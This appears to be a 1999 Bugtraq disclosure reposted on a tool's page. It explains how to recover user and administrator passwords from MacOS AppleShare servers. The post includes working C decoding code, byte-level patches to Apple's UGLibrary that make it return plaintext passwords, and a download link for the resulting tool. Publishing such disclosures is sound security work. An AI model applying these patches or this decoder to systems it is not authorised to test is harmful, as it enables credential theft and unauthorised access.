ASPID
Last modification date: Oct 7, 1999
From spd Tue Sep 14 22:10:54 1999
Subject: MacOS system encryption algorithm 3
To: BUGTRAQ@SECURITYFOCUS.COM
Date: Tue, 14 Sep 1999 22:10:54 +0200 (DST)
Sometime ago, Dawid adix Adamski <adixx at FRIKO4.ONET.PL> sent to
bugtraq the encryption algorithm in MacOS personal AppleShare
server he found.
I have been researching a little on this subject, and I've found
his code fails when decoding the first character of the password,
for this char you need additional data from the "Users & Groups
Data File", specifically, the 4th byte after the encoded sequence
described in his message.
So, after cleaning a little the code, you get something as simple as
this:
---------------------------------------------------------------------------
#include <stdio.h>
int main(){
register int i=0;
unsigned char *mask="rpcgtprk";
unsigned char *pw="\x28\x08\x2F\x3B\x20\x36\x30\x5B\x00\x00\x00\x09";
unsigned char c;
for(i=0; i<7; i++)
{
c = pw[6-i] ^ mask[7-i];
pw[7-i] ^= c;
}
c = pw[11] ^ mask[7-i];
pw[7-i] ^= c;
printf("\"%s\"\n",pw);
}
---------------------------------------------------------------------------
But you still have to find the encrypted passwords in the binary
data file.
Apple's AppleShare SDK provides a "UGLibrary" to deal with this
data file; but it doesn't let you access the user password (which
is decrypted in the stack when you call "UGAuthenticateUser()",
nor the encrypted one.
In fact, in this call, the encrypted password is decrypted to the
stack, and compared against the user supplied one.
So, all we have to do is replace the compare with a copy:
* 00000206: B036 70F4 '.6p.' CMP.B -$0C(A6,D7.W),D0
* 0000020A: 6710 'g.' BEQ.S *+$0012 ; 0000021C
*
is replaced with
*
* # ADDQ.W #$02,A2 544A
* # MOVE.B D0,-(A2) 1500
* # BRA.S *+$0012 6010
*
* i.e., go to offset 28A0 and replace "B036 70F4 6710" with "544A 1500 6010"
* in "UGLibrary.o"
After that, we can build a simple program (about 150 lines) and
with just a double click, we get a listing with all the users
and decoded passwords in the system.
That's enough for the personal AppleShare server included with
MacOS 7.x and 8.x; for AppleShare server 3.x (and, probably 4.x;
I didn't check it) the data file is protected by a "administrator
password" so you need it before being able to use the modified
UGAuthenticateUser().
But that password uses the same encryption algorithm/check as
the users ones, so we only have to change "UGOpenFile()" in the
same way:
at offset 0A92, B030 7000 671A becomes 544A 1500 601A
So, with these modifications, AppleShare 3.x admin password
is returned into filePB.ugAdminKey after UGOpenFile() and
users password are returned into userPB.ugPassword after
UGAuthenticateUser(), both in plain text format.
A program which uses this method for listing users and passwords
can be found (both MacOS 68k binary and source code) at
ftp://ivo.cps.unizar.es/pub/SPDsoft/ASPID.sit
(Stuffit 5.x archive)
All of these use Adixx code; ASPID uses Apple UG Lib code instead.
Go to Persephone Home Page.
Go to SPDsoft Home Page.